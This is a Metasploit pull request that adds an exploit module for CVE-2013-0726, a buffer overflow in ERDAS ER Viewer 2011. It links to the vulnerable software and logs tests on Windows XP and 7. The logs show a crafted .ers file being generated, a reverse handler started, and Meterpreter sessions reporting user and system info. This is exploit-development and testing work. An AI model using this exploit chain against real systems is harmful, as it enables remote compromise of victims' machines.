Add module for CVE-2013-0726 #1808

Merged
merged 1 commit into from May 8, 2013

jvazquez-r7
Contributor

Vulnerable software: ERS Viewer 2011, version 11.04, can be found here:

http://geospatial.intergraph.com/resources/downloads/download/ERDAS_ER_Viewer_2011_Version_11_0_4.aspx?Downloads=ProductDownloadItem

Tested on Windows XP SP3 and W7 SP1:

msf exploit(erdas_er_viewer_bof) > rexploit
[*] Reloading module...

[+] msf.ers stored at /Users/juan/.msf4/local/msf.ers
msf exploit(erdas_er_viewer_bof) > use exploit/multi/handler 
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 10.6.0.165:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:51547) at 2013-05-08 13:21:45 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 10.6.0.165:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 3 opened (10.6.0.165:4444 -> 10.6.0.165:51690) at 2013-05-08 13:36:22 -0500

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
emeterpreter > exit -y
[*] Shutting down Meterpreter...

wchen-r7 added a commit that referenced this pull request May 8, 2013
@wchen-r7 wchen-r7 merged commit 1aa80cd into rapid7:master May 8, 2013
@jvazquez-r7 jvazquez-r7 deleted the erdas_er_viewer_bof branch November 18, 2014 15:46